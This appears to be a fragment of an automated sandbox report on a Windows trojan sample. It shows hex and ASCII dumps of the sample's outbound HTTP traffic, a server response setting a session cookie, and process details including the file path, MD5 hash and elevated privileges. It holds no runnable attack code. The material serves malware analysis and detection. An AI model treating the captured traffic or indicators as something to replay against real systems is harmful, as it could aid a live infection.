                                              2024-05-03 03:28:26 UTC15331OUTData Raw: c3 04 a3 98 51 f6 65 01 bf 7a a8 7e ce cf 85 d4 d9 22 ed bc 71 e3 c5 7a 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09
                                              Data Ascii: Qez~"qz1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 88 3c f4 f3 54 da 69 ff a3 86 b8 a3 cc bc 12 f4 eb 00 ed 87 1d 6b 73 fe 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38
                                              Data Ascii: <Tiks|nC{.M9| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-|/w}cV~/g8
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 63 51 5b 44 19 77 30 d1 01 b3 36 8d d4 87 27 e8 e2 e1 3a cc bd c7 f3 83 db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69
                                              Data Ascii: cQ[Dw06':zEznXfJ-qwnqpvREBrk+|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 9e 6f 15 c7 6c 29 ca 46 9f 4c cf fb 4c ee 40 91 ea 7a dc 74 7b 00 97 6d de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26
                                              Data Ascii: ol)FLL@zt{m/LAFoYi|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\|]&
                                              2024-05-03 03:28:28 UTC818INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=9qtbmhs9l0epe6i5kiu7dfokb2; expires=Mon, 26-Aug-2024 21:15:07 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YxTMSHx1goYD0m%2B0nG5dAYa5ZTmFaxXV20kXhaxLZIYB9e9GC3CUNECR%2BBtVryKHes9lA%2BAtLAYaWlEn5aUYsSNG2vQkXAZtQZdwLpmnsTFJWMyOY5%2FR5k4oBgD%2Bwt9jQDrrk%2FRjW0e%2BQ6c%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd29371bfe8c9b-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:05:28:15
                                              Start date:03/05/2024
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe"
                                              Imagebase:0x640000
                                              File size:8'162'448 bytes
                                              MD5 hash:2B9166E260CDDBC58DB20A0C54A6D145
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              No disassembly